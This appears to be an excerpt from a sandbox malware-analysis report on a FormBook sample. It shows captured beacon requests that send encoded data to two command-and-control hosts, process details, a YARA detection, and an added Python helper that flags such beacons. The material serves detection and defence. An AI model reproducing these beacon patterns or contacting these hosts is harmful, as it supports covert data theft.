                                                                                  X-Nf-Request-Id: 01JEW0DH2ZEN27KMS03R7EWMTH
                                                                                  Connection: close
                                                                                  Transfer-Encoding: chunked
                                                                                  Data Raw: 63 32 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 54 65 61 6c 36 30 30 3a 32 20 31 32 38 20 31 32 35 3b 2d 2d 63 6f 6c 6f 72 54 65 61 6c 41 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 54 65 61 6c 36 30 30 29 3b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 31 30 30 3a 32 34 36 20 32 34 36 20 32 34 37 3b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 32 30 30 3a 32 33 33 20 32 33 35 20 32 33 37 3b 2d 2d 63 6f 6c 6f 72 48 [TRUNCATED]
                                                                                  Data Ascii: c28<!doctype html><html lang=en><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1"><title>Site not found</title><style>:root{--colorRgbFacetsTeal600:2 128 125;--colorTealAction:var(--colorRgbFacetsTeal600);--colorRgbFacetsNeutralLight100:246 246 247;--colorRgbFacetsNeutralLight200:233 235 237;--colorHr:var(--colorRgbFacetsNeutralLight200);--colorRgbFacetsNeutralLight700:53 58 62;--colorGrayDarkest:var(--colorRgbFacetsNeutralLight700);--colorGrayLighter:var(--colorRgbFacetsNeutralLight200);--colorGrayLightest:var(--colorRgbFacetsNeutralLight100);--colorText:var(--colorGrayDarkest);--effectShadowLightShallow:0 1px 10px 0 rgb(53 58 62 / 6%), 0 2px 4px 0 rgb(53 58 62 / 8%);--colorRgbFacetsNeutralDark900:6 11 16;--colorStackText:rgb(var(--colorGrayDarkest));--colorCodeText:rgb(var(--colorGrayLightest));--colorRgbFacetsNeutralLight600:84 90 97;--colorGrayDarker:var(--colorRgbFacetsNeutralLight600);--colorTextMuted:var(--colorGrayDarker)}body{font-family:syst [TRUNCATED]
                                                                                  Dec 12, 2024 00:21:11.851201057 CET | 1236 | IN | Data Raw: 63 53 79 73 74 65 6d 46 6f 6e 74 2c 73 65 67 6f 65 20 75 69 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2c 61 70 70 6c 65 20 63 6f 6c 6f 72 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20
                                                                                  Data Ascii: cSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#fff;overflow:hidden;margin:0;padding:0;line-height:1.5;color:rgb(var(--colorText))}@media(prefers-color-scheme:dark){body{backg
                                                                                  Dec 12, 2024 00:21:11.851213932 CET | 907 | IN | Data Raw: 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 43 6f 64 65 54 65 78 74 29 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 53 74 61 63 6b 54 65 78 74 29 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 38 70
                                                                                  Data Ascii: k;background-color:var(--colorCodeText);color:var(--colorStackText);padding:4px 8px;border-radius:4px;font-size:.875rem;overflow-wrap:anywhere;font-family:ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,liberation mono,courier new,monospace;


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  39 | 192.168.2.5 | 50015 | 3.125.36.175 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 12, 2024 00:21:13.138943911 CET | 1798 | OUT | POST /laeb/ HTTP/1.1
                                                                                  Host: www.thezensive.work
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.thezensive.work
                                                                                  Referer: http://www.thezensive.work/laeb/
                                                                                  Content-Length: 1243
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 63 33 34 45 66 2b 44 47 6a 32 34 71 72 30 5a 39 4c 4f 58 43 43 56 4f 46 74 31 53 2f 6d 33 55 32 58 53 30 35 4f 2f 72 32 2b 31 37 71 41 66 59 7a 39 50 7a 71 32 44 54 45 76 75 65 53 67 4b 58 45 48 63 48 4e 35 4e 47 4c 5a 6c 34 53 41 31 79 4d 4d 6a 74 74 61 35 68 74 68 78 2b 37 54 56 30 4a 73 49 62 74 78 52 67 59 39 39 48 37 49 72 31 72 68 56 61 33 4f 45 31 4d 4c 65 69 64 32 56 44 74 4d 38 51 4b 6f 65 6f 31 31 64 65 4c 6d 41 47 58 38 6c 34 65 73 6e 6b 68 47 6c 62 42 75 37 41 34 5a 66 69 6d 74 4d 32 76 38 36 65 6b 38 35 52 58 32 54 74 4b 75 68 41 79 7a 67 36 37 41 5a 64 33 70 35 39 42 69 58 64 57 76 39 4d 6d 5a 42 44 2f 77 2f 2f 41 6e 6d 76 77 61 36 45 6b 49 68 7a 66 62 52 32 65 35 34 30 36 46 71 51 6b 78 52 4f 47 49 52 45 6e 68 63 41 35 69 4c 6b 71 50 6f 43 66 35 59 30 6f 70 77 6f 4c 6e 75 7a 68 70 4f 4a 39 57 64 32 51 64 33 58 47 73 43 76 39 7a 62 7a 77 54 44 78 34 6c 6a 2b 7a 69 74 37 63 6a 4e 62 52 76 44 2b 33 36 4b 47 34 52 2b 67 64 2f 58 54 43 59 6b 4e 6c 74 32 76 69 32 78 51 [TRUNCATED]
                                                                                  Data Ascii: LDVlCz=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 [TRUNCATED]


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  40 | 192.168.2.5 | 50016 | 3.125.36.175 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 12, 2024 00:21:15.791404009 CET | 506 | OUT | GET /laeb/?LDVlCz=R1QkcJ3G5DA9kU07Q4bHZGXwpE7poG4obEoFTYXYr0KTY8cjuufgj2Wfg7CEtb/if9/3otTPHXcvO0KabB4WT9d0qR/eTQNYs+qdxysYlPDjIZ08l2KjBlYrb7eSynDgaw==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1
                                                                                  Host: www.thezensive.work
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Dec 12, 2024 00:21:17.158143044 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html
                                                                                  Date: Wed, 11 Dec 2024 23:21:16 GMT
                                                                                  Server: Netlify
                                                                                  X-Nf-Request-Id: 01JEW0DP9F8NNKJJTX4FMN3PDE
                                                                                  Connection: close
                                                                                  Transfer-Encoding: chunked
                                                                                  Data Raw: 63 32 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 54 65 61 6c 36 30 30 3a 32 20 31 32 38 20 31 32 35 3b 2d 2d 63 6f 6c 6f 72 54 65 61 6c 41 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 54 65 61 6c 36 30 30 29 3b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 31 30 30 3a 32 34 36 20 32 34 36 20 32 34 37 3b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 32 30 30 3a 32 33 33 20 32 33 35 20 32 33 37 3b 2d 2d 63 6f 6c 6f 72 48 [TRUNCATED]
                                                                                  Data Ascii: c28<!doctype html><html lang=en><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1"><title>Site not found</title><style>:root{--colorRgbFacetsTeal600:2 128 125;--colorTealAction:var(--colorRgbFacetsTeal600);--colorRgbFacetsNeutralLight100:246 246 247;--colorRgbFacetsNeutralLight200:233 235 237;--colorHr:var(--colorRgbFacetsNeutralLight200);--colorRgbFacetsNeutralLight700:53 58 62;--colorGrayDarkest:var(--colorRgbFacetsNeutralLight700);--colorGrayLighter:var(--colorRgbFacetsNeutralLight200);--colorGrayLightest:var(--colorRgbFacetsNeutralLight100);--colorText:var(--colorGrayDarkest);--effectShadowLightShallow:0 1px 10px 0 rgb(53 58 62 / 6%), 0 2px 4px 0 rgb(53 58 62 / 8%);--colorRgbFacetsNeutralDark900:6 11 16;--colorStackText:rgb(var(--colorGrayDarkest));--colorCodeText:rgb(var(--colorGrayLightest));--colorRgbFacetsNeutralLight600:84 90 97;--colorGrayDarker:var(--colorRgbFacetsNeutralLight600);--colorTextMuted:var(--colorGrayDarker)}body{font-family:syst [TRUNCATED]
                                                                                  Dec 12, 2024 00:21:17.158221006 CET | 1236 | IN | Data Raw: 63 53 79 73 74 65 6d 46 6f 6e 74 2c 73 65 67 6f 65 20 75 69 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2c 61 70 70 6c 65 20 63 6f 6c 6f 72 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20
                                                                                  Data Ascii: cSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#fff;overflow:hidden;margin:0;padding:0;line-height:1.5;color:rgb(var(--colorText))}@media(prefers-color-scheme:dark){body{backg
                                                                                  Dec 12, 2024 00:21:17.158231020 CET | 907 | IN | Data Raw: 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 43 6f 64 65 54 65 78 74 29 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 53 74 61 63 6b 54 65 78 74 29 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 38 70
                                                                                  Data Ascii: k;background-color:var(--colorCodeText);color:var(--colorStackText);padding:4px 8px;border-radius:4px;font-size:.875rem;overflow-wrap:anywhere;font-family:ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,liberation mono,courier new,monospace;


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  41 | 192.168.2.5 | 50017 | 172.67.176.240 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 12, 2024 00:21:22.641112089 CET | 770 | OUT | POST /26nq/ HTTP/1.1
                                                                                  Host: www.zrichiod-riech.sbs
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.zrichiod-riech.sbs
                                                                                  Referer: http://www.zrichiod-riech.sbs/26nq/
                                                                                  Content-Length: 207
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 35 31 35 55 38 36 59 2f 69 6e 74 74 38 71 31 72 54 58 57 31 4f 6b 63 73 5a 45 57 38 74 70 30 67 77 66 79 34 47 4f 49 44 4f 39 42 56 50 44 48 4a 4b 4f 53 44 52 4f 4e 77 74 41 53 64 65 59 75 61 56 69 44 61 30 2b 78 42 6b 42 70 53 4c 67 65 66 4f 71 51 4b 4a 6f 55 6c 42 49 61 74 4f 37 78 38 77 79 39 71 65 69 32 47 4e 71 52 68 39 5a 5a 66 64 64 47 4d 4d 4c 43 52 69 6c 50 39 67 4d 2f 4b 79 7a 32 72 45 78 35 33 6a 36 6d 4a 62 6f 6c 64 6d 57 61 64 66 30 31 53 6b 55 45 53 75 4f 7a 57 45 42 76 4d 64 47 33 66 4b 65 48 77 4e 6c 78 70 36 6a 53 51 4e 41 38 57 38 39 72 4e 68 66 67 38 2b 6f 45 77 41 67 63 3d
                                                                                  Data Ascii: LDVlCz=515U86Y/intt8q1rTXW1OkcsZEW8tp0gwfy4GOIDO9BVPDHJKOSDRONwtASdeYuaViDa0+xBkBpSLgefOqQKJoUlBIatO7x8wy9qei2GNqRh9ZZfddGMMLCRilP9gM/Kyz2rEx53j6mJboldmWadf01SkUESuOzWEBvMdG3fKeHwNlxp6jSQNA8W89rNhfg8+oEwAgc=


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  42 | 192.168.2.5 | 50018 | 172.67.176.240 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 12, 2024 00:21:25.298693895 CET | 790 | OUT | POST /26nq/ HTTP/1.1
                                                                                  Host: www.zrichiod-riech.sbs
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.zrichiod-riech.sbs
                                                                                  Referer: http://www.zrichiod-riech.sbs/26nq/
                                                                                  Content-Length: 227
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 35 31 35 55 38 36 59 2f 69 6e 74 74 36 4f 78 72 52 30 4f 31 43 55 63 76 54 6b 57 38 6e 4a 30 38 77 66 75 34 47 4d 6c 65 4f 4c 35 56 49 69 33 4a 4a 4b 47 44 57 4f 4e 77 6d 67 53 59 42 49 75 56 56 69 2b 77 30 38 56 42 6b 42 39 53 4c 67 75 66 4f 35 49 4e 47 59 55 64 55 59 61 56 54 4c 78 38 77 79 39 71 65 69 6a 68 4e 75 39 68 39 6f 70 66 53 66 69 44 46 72 43 53 6c 6c 50 39 32 4d 2f 4f 79 7a 32 4e 45 77 56 52 6a 34 65 4a 62 74 42 64 6c 48 61 61 47 45 31 55 37 6b 46 6d 6f 72 53 79 45 79 7a 47 61 6b 43 39 66 59 54 4f 4d 54 41 44 67 42 61 34 65 67 51 75 73 75 6a 36 77 76 42 56 6b 4c 55 41 65 33 4c 56 77 35 6a 33 59 4f 57 73 4a 69 6c 4f 38 75 49 78 67 78 59 6c
                                                                                  Data Ascii: LDVlCz=515U86Y/intt6OxrR0O1CUcvTkW8nJ08wfu4GMleOL5VIi3JJKGDWONwmgSYBIuVVi+w08VBkB9SLgufO5INGYUdUYaVTLx8wy9qeijhNu9h9opfSfiDFrCSllP92M/Oyz2NEwVRj4eJbtBdlHaaGE1U7kFmorSyEyzGakC9fYTOMTADgBa4egQusuj6wvBVkLUAe3LVw5j3YOWsJilO8uIxgxYl


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  43 | 192.168.2.5 | 50019 | 172.67.176.240 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 12, 2024 00:21:27.953502893 CET | 1807 | OUT | POST /26nq/ HTTP/1.1
                                                                                  Host: www.zrichiod-riech.sbs
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.zrichiod-riech.sbs
                                                                                  Referer: http://www.zrichiod-riech.sbs/26nq/
                                                                                  Content-Length: 1243
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 35 31 35 55 38 36 59 2f 69 6e 74 74 36 4f 78 72 52 30 4f 31 43 55 63 76 54 6b 57 38 6e 4a 30 38 77 66 75 34 47 4d 6c 65 4f 4c 78 56 49 51 2f 4a 50 64 36 44 58 4f 4e 77 36 51 53 5a 42 49 75 49 56 6d 71 72 30 38 70 72 6b 43 46 53 4b 44 6d 66 65 63 38 4e 52 49 55 64 4d 6f 61 75 4f 37 77 2b 77 7a 52 75 65 69 7a 68 4e 75 39 68 39 71 68 66 62 74 47 44 4a 4c 43 52 69 6c 50 78 67 4d 2f 32 79 7a 76 34 45 77 52 6e 6a 4a 2b 4a 62 4e 52 64 6e 30 79 61 50 45 31 57 34 6b 46 2b 6f 72 57 74 45 79 76 73 61 67 43 58 66 66 6e 4f 41 6c 45 56 30 43 61 4a 63 67 49 39 75 63 4b 57 6c 2f 4a 65 6b 4c 6f 78 63 67 76 6f 2f 36 4c 35 65 72 65 39 4c 6a 64 48 6a 4c 34 78 75 56 6c 50 39 52 67 32 4d 57 63 66 38 47 57 4e 34 4d 75 4b 78 4d 44 71 57 77 52 57 79 72 76 46 70 49 49 6b 77 41 53 72 41 72 44 6b 55 4e 59 63 62 57 31 47 73 70 5a 69 73 30 61 46 45 71 79 78 44 6d 75 30 51 62 79 6b 46 4e 53 78 36 6b 76 39 30 2b 79 6b 4b 36 50 4a 45 43 4d 68 66 71 4e 74 63 6c 79 51 6d 51 76 49 34 71 58 53 41 59 50 6d 58 61 7a [TRUNCATED]
                                                                                  Data Ascii: LDVlCz=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 [TRUNCATED]


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  44 | 192.168.2.5 | 50020 | 172.67.176.240 | 80 | 5884 | C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 12, 2024 00:21:30.642664909 CET | 509 | OUT | GET /26nq/?LDVlCz=03R0/PY94GJRzPoOKSenb2h5QS/Kl50E/qK0YcgrJ8wpZCLSP+GtGIEwrkK3Oa2ONw/TguZq9BdWMDmUOrZ+COkHC5rjPuI42FsUNzu6Vv93haoOa+yyAoKItnrc6cGBtQ==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1
                                                                                  Host: www.zrichiod-riech.sbs
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Dec 12, 2024 00:22:10.729553938 CET | 966 | IN | HTTP/1.1 522
                                                                                  Date: Wed, 11 Dec 2024 23:22:10 GMT
                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                  Content-Length: 15
                                                                                  Connection: close
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z%2BgNasc%2BjL9ILc7Wr45%2BfKyGWoSymvk%2BoESn7pij8v9kvzqRJ%2BPUz9h0Iob7tP7U1OmBoC4GzLxaXN1NTyfcPh7pNIKOPnca7vRhjcIMH6i6RaRsQid8ULxUxICOldPeKSw8N2%2Bg29Pl"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  Referrer-Policy: same-origin
                                                                                  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8f0936240f83330c-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1994&min_rtt=1994&rtt_var=997&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=509&delivery_rate=0&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                                                  Data Ascii: error code: 522
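The sessions above show the beacon shape the injected process (pNkvbgLNQpIoyz.exe, PID 5884) uses against both C2 hosts: three form-urlencoded POSTs to a short directory (/laeb/, /26nq/) with a single field named LDVlCz, Origin and Referer pointing at that same directory, Cache-Control: no-cache, a fixed "UBrowser" User-Agent, and then a GET carrying the same LDVlCz field plus a second parameter NdLhG. The field name is identical across www.thezensive.work and www.zrichiod-riech.sbs, so it belongs to the sample, not the domain. Neither host answered usefully during the run: the Netlify 404 ("Site not found") and the Cloudflare 522 mean no tasking was received, so detection must not depend on a successful response. The following triage helper is an added example, not part of the Joe Sandbox report or of FormBook itself; it scores raw requests against exactly those traits. The sample requests, their bodies, the benign login request and the host intranet.example.test are constructed for the example.

```python
import re

# Added example: scores raw HTTP requests against the beacon traits visible in
# the sandbox sessions. Sample bodies and the benign request are constructed.

UA_MARKER = "UBrowser/"
BASE64ISH = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def split_params(encoded):
    """Split k=v&k=v without percent-decoding so '+', '/' and '=' in base64 survive."""
    pairs = [p.partition("=") for p in encoded.split("&") if p]
    return [(name, value) for name, _, value in pairs]


def looks_base64(value, min_len=32):
    return len(value) >= min_len and BASE64ISH.match(value) is not None


def beacon_indicators(raw):
    """Return the FormBook-style traits present in one request, in a fixed order."""
    method, path, headers, body = parse_request(raw)
    host = headers.get("host", "")
    directory = path.split("?", 1)[0]
    found = []
    # The C2 directory is named as its own Origin/Referer; a browser's first
    # request to a bare path would not self-refer like this.
    if headers.get("origin") == f"http://{host}":
        found.append("origin_equals_host")
    if headers.get("referer") == f"http://{host}{directory}":
        found.append("referer_is_c2_directory")
    if UA_MARKER in headers.get("user-agent", ""):
        found.append("ubrowser_user_agent")
    if method == "POST" and headers.get("content-type") == "application/x-www-form-urlencoded":
        params = split_params(body)
        if len(params) == 1 and looks_base64(params[0][1]):
            found.append("single_base64_form_field")
        if headers.get("cache-control") == "no-cache":
            found.append("post_no_cache")
    if method == "GET" and "?" in path:
        params = split_params(path.split("?", 1)[1])
        if len(params) == 2 and looks_base64(params[0][1]):
            found.append("get_base64_plus_token")
    return found


def is_beacon(raw, min_indicators=2):
    return len(beacon_indicators(raw)) >= min_indicators


def shared_param_name(raws):
    """Name of the first parameter if every request uses the same one, else None."""
    names = set()
    for raw in raws:
        method, path, _headers, body = parse_request(raw)
        params = split_params(body if method == "POST" else path.partition("?")[2])
        names.add(params[0][0] if params else None)
    return names.pop() if len(names) == 1 else None


def _req(start_line, headers, body=""):
    return "\r\n".join([start_line, *headers, "", body])


# Constructed samples modelled on the captured sessions (bodies are placeholders).
UA = ("Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
      "Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36")
BEACON_POST = _req("POST /laeb/ HTTP/1.1", [
    "Host: www.thezensive.work", "Origin: http://www.thezensive.work",
    "Referer: http://www.thezensive.work/laeb/", "Connection: close",
    "Cache-Control: no-cache", "Content-Type: application/x-www-form-urlencoded",
    "User-Agent: " + UA], "LDVlCz=" + "A" * 60 + "+/Zz==")
BEACON_GET = _req("GET /26nq/?LDVlCz=" + "B" * 80 + "==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1",
                  ["Host: www.zrichiod-riech.sbs", "Connection: close", "User-Agent: " + UA])
BENIGN_POST = _req("POST /login HTTP/1.1", [
    "Host: intranet.example.test", "Origin: https://intranet.example.test",
    "Referer: https://intranet.example.test/login?next=%2Fhome",
    "Content-Type: application/x-www-form-urlencoded",
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0 Safari/537.36"],
    "username=alice&password=hunter2&csrf=abc123")

if __name__ == "__main__":
    for label, raw in [("beacon POST", BEACON_POST), ("beacon GET", BEACON_GET),
                       ("benign POST", BENIGN_POST)]:
        print(f"{label}: beacon={is_beacon(raw)} {beacon_indicators(raw)}")
    print("shared parameter name:", shared_param_name([BEACON_POST, BEACON_GET]))
```

The literal values (the UBrowser User-Agent, LDVlCz, NdLhG, the directories) rotate between builds, so a production rule should lean on the structural traits the helper scores, and the hosts www.thezensive.work and www.zrichiod-riech.sbs should be blocked regardless of the 404 and 522 seen here.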


                                                                                  Target ID:0
                                                                                  Start time:18:17:54
                                                                                  Start date:11/12/2024
                                                                                  Path:C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe"
                                                                                  Imagebase:0xb50000
                                                                                  File size:1'188'352 bytes
                                                                                  MD5 hash:8A85446EBB8EB07A56672AFA7C1B7FBC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:18:17:55
                                                                                  Start date:11/12/2024
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe"
                                                                                  Imagebase:0x960000
                                                                                  File size:46'504 bytes
                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2248280939.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
